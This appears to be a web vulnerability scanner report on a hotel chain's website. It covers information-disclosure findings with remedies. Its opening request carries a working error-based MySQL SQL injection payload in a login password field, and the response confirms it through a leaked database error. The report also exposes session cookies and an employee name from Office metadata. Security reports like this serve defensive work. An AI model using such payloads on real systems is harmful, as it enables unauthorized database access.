User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=izxqi2md55dl3345s43dcm55; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 500
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=1%27+or+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1&submitbutton=Login&uname=Ronald+Smith

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:22:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4645



<!-- %@ import Namespace="MySql.Data.MySqlClient" % -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">



<html>

<head>

<title>Kimpton Standards Login</title>

<link rel="stylesheet" type="text/css" href="../_css/global.css">
<style type="text/css">
<!--

body {
background: #FFFFFF;
}

-->
</style>
</head>



<body>

<form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="ctl00">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['ctl00'];
if (!theForm) {
theForm = document.ctl00;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=-b7UqH0vtZuZGPZs3YNpmA2&amp;t=633925424339517500" type="text/javascript"></script>


<script src="/WebResource.axd?d=JFcpFU90xutwtLPW0qJGJ5vfTzBDcTMPuZSy1P53lIE1&amp;t=633925424339517500" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq" />
</div>

<table border="0" width="600" valign="top" class="kim11">

<tr>

<td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br />

<p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td>



</tr>
<tr>
<td colspan="2"><br />We could not process your request.<br />ERROR [HY000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83-community-nt]Duplicate entry '_!@4dilemma:0' for key 1</td>
</tr>

<tr>

<td width="100">
<p style="margin: 10px 0 0 6px;">
<strong>Username</strong>
<span id="runame" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="uname" type="text" value="Ronald Smith" id="uname" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr valign="top">

<td width="100">
<p style="margin: 0 0 0 6px;">
<strong>Password</strong>
<span id="rpword" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="pword" type="text" value="1' or row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)-- 1" id="pword" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr>

<td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;submitbutton&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="submitbutton" /></td>

</tr>

</table>


<script type="text/javascript">
//<![CDATA[
var Page_Validators = new Array(document.getElementById("runame"), document.getElementById("rpword"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var runame = document.all ? document.all["runame"] : document.getElementById("runame");
runame.controltovalidate = "uname";
runame.errormessage = "Required";
runame.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
runame.initialvalue = "";
var rpword = document.all ? document.all["rpword"] : document.getElementById("rpword");
rpword.controltovalidate = "pword";
rpword.errormessage = "Required";
rpword.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
rpword.initialvalue = "";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return ValidatorCommonOnSubmit();
}
else {
return true;
}
}
//]]>
</script>
</form>

</body>

</html>

ASP.NET Version Disclosure

ASP.NET Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /

/

http://www.kimptonhotels.com/

Extracted Version

X-AspNet-Version: 2.0.50727

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hqffzavz0qccqezxot2gi5ei; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69686



<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton Hotels: Boutique Hotels, Luxury Travel and Chef-Driven Gourmet Restaurants</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="WT.sp" content="KC-Corp">
<meta name="robots" content="noodp, noydir">
<meta name="description" content="Care, comfort, style, flavor, fun - Kimpton Hotels have it all. Four star boutique hotels and gourmet restaurants in San Francisco, Washington DC, Chicago and other great cities.">
<meta name="keywords" content="Kimpton boutique hotels, boutique hotels, botiuqe hotels, small luxury hotels, hip hotels, best hotels, 4 star hotels, gourmet restaurants, guest rewards program, corporate social responsibility, honeymoon hotels, wedding hotels, green hotels, pet friendly hotels, womens travel, top restaurants, business hotels">
<script type="text/javascript" src="_js/menucontrol.js"></script>
<script src="_js/IEHoverPseudo.js" language="javascript"></script>
<script src="_js/rollover.js" language="javascript"></script>
<script src="_js/snipe_control.js" language="javascript"></script>
<link rel="stylesheet" type="text/css" href="_css/global.css">
<script type="text/javascript" src="_js/swfobject.js"></script>
<script type="text/javascript">swfobject.registerObject("myId", "9.0.0", "_js/expressInstall.swf");</script>



<script language="JavaScript">
<!--
if (document.images) {
//Preload main nav bar

var mkhoff = new Image();
mkhoff.src = "images-ap-home/ap_55f_chef.jpg";
var mkhon = new Image();
mkhon.src = "images-ap-home/ap_55f_clr_chef.jpg";

}


function rollon(img) {
if (document.images){
document[img].src=eval(img+"on.src");
}
}

function rolloff(img) {
if (document.images){
document[img].src=eval(img+"off.src");
}}//-->

</script>

<script language="JavaScript">
<!--
if ((typeof section != "undefined") && (document.images))
{
eval( "m" + section + "off.src = m" + section + "on.src");
rollon ("m" + section);
}
// -->
</script>



</head>
<body onLoad="IEHoverPseudo()">
<center>
<!-- INTOUCH INC -->
<div class="intouchinc"><DIV id=intouch_menu style="BORDER-RIGHT: #4e4d94 0px; PADDING-RIGHT: 0px; BORDER-TOP: #4e4d94 0px; PADDING-LEFT: 0px; Z-INDEX: 10; LEFT: 0px; PADDING-BOTTOM: 0px; BORDER-LEFT: #4e4d94 0px; PADDING-TOP: 0px; BORDER-BOTTOM: #4e4d94 0px; POSITION: relative; TOP: -2px"><span class='kim10' id='kimwhite'><strong></strong> &nbsp;<img src='assets/clear.gif' width='1' height='11' border='0'>&nbsp; </span><span class='kim10'>&nbsp;</span></SPAN></DIV>


</div>
<div class="corner-btmlft"><div class="corner-btmrgt"><div class="corner-toplft"><div class="corner-toprgt">
<!-- TOPNAV INC -->
<div class="navtopHome">
<div id="navwrapper">



<script language="Javascript">
<!--
function ClearSearchBox(theText)
{
if (theText.value == theText.defaultValue) theText.value = ""
}
//-->
</script>

<script src="/_js/popup-window.js" type="text/javascript"></script>
<script src="/_js/preload.js" type="text/javascript"></script>
<link href="/_css/topnav.css" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/_css/topnav-ie.css" rel="stylesheet" type="text/css" /><![endif]-->

<table width="780" height="38" cellpadding="0" cellspacing="0" border="0" id="primary-nav">
<tr>
<td width="89"><a href="/reservations/hotel-reservations.aspx" id="nav_reservations"><img src="/images-nav/navtop-rese-off.png" alt="Reservations" name="Reservations" width="89" height="38" border="0" id="Reservations" /></a></td>
<td width="80"><ul id="primary-nav">
<li class="menuparent"><a href="/promotions/promotions.aspx"><img src="/images-nav/navtop-prom-off.png" alt="Promotions" name="Promotions" width="80" height="38" border="0" id="Promotions" onmouseover='this.src="/images-nav/navtop-prom-on.png"' onmouseout='this.src="/images-nav/navtop-prom-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/promotions/best-rate-guarantee.aspx">Best Rate Guarantee<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="http://travel.wwte1.com/pubspec/scripts/eap.asp?goto=eta&eapid=11516-30001&lang=1033&ovrd=3" target="_blank">Air/Car/Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hotel-packages.aspx">Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/aaa.aspx">AAA Members<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/summer-playground.aspx">Your Summer Playground<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/winter-spark.aspx">Winter Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/holiday-party-offer.aspx">Holiday Party Offer<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/dollar-deals.aspx">Just $1 More Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/government-rates.aspx">Government Rates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/sweet-tax-relief.aspx">Sweet Tax Relief<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/sunday-sleep-in.aspx">Sunday Sleep-In<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/rub-the-one-youre-with.aspx">Rub the One You're With<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/ride-the-rails.aspx">Ride the Rails<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/we-got-your-bag.aspx">We've Got Your Bag<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hybrid-parking.aspx">Hybrid Parking Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/programs/lgbt-all-play.aspx">LGBT - All Play, No Work<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/KimptonReservator">The Kimpton Reservator&trade;<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="#" onclick="popup('http://www.gifttracker.com/cgi-bin/default.asp?COID=1607')">Gift Certificates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/intouch/EMLogin.aspx">Receive Newsletters &amp; Offers<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/intouch/EMGuestUpdate.aspx">Manage My Newsletters<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
</ul>
</li>
</ul>
</li>
</ul></td>
<td width="52"><ul id="primary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx"><img src="/images-nav/navtop-hote-off.png" alt="Hotels" name="Hotels" width="52" height="38" border="0" id="Hotels" onmouseover='this.src="/images-nav/navtop-hote-on.png"' onmouseout='this.src="/images-nav/navtop-hote-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx">All Hotels<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/locations.aspx">Cities<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels-alexandria.aspx">Alexandria<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-arlington.aspx">Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-aspen.aspx">Aspen<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-atlanta.aspx">Atlanta<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-baltimore.aspx">Baltimore<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-boston.aspx">Boston/Cambridge<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-chicago.aspx">Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-dallas.aspx">Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-denver.aspx">Denver<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-losangeles.aspx">Los Angeles<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-miami.aspx">Miami<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-newyorkcity.aspx">New York City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-philadelphia.aspx">Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-portland.aspx">Portland<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-saltlakecity.aspx">Salt Lake City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sandiego.aspx">San Diego<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanfrancisco.aspx">San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-scottsdale.aspx">Scottsdale<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-seattle.aspx">Seattle<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanjose.aspx">Silicon Valley/Cupertino<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/hotels/hotels-vancouver.aspx">Vancouver, B.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/hotels/hotels-verobeach.aspx">Vero Beach<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-washingtondc.aspx">Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent"><a href="/hotels/hotel-palomars.aspx">Hotel Palomar<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-arlington/">Hotel Palomar Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-atlanta-midtown/">Hotel Palomar Atlanta-Midtown<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-chicago/">Hotel Palomar Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-dallas/">Hotel Palomar Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-los-angeles-westwood/">Hotel Palomar LA-Westwood<img src="/asset..
MS Office Information Disclosure

MS Office Information Disclosure

54 TOTAL
INFORMATION
Netsparker found HTML files that are produced by MS Office Suite. MS Office has appended user related information to the document.

Impact

This information can be used for social engineering attacks.

Remedy

Remove all sensitive information from your HTML documents.
- /pdfs/press/html/World-Savers-0909/

/pdfs/press/html/World-Savers-0909/

http://www.kimptonhotels.com/pdfs/press/html/World-Savers-0909/

Request

GET /pdfs/press/html/World-Savers-0909/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/World-Savers-0909/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35989
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<link rel=OLE-Object-Data href="images/oledata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>4</o:TotalTime>
<o:LastPrinted>2009-09-01T17:34:00Z</o:LastPrinted>
<o:Created>2009-09-22T21:32:00Z</o:Created>
<o:LastSaved>2009-09-22T21:32:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>743</o:Words>
<o:Characters>4240</o:Characters>
<o:Lines>35</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>5207</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-alt:"\30D2\30E9\30AE\30CE\89D2\30B4 Pro W3";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
h2
{mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0in;
margin-bottom:3.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:2;
font-size:14.0pt;
font-family:Arial;
mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold;
font-style:italic;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
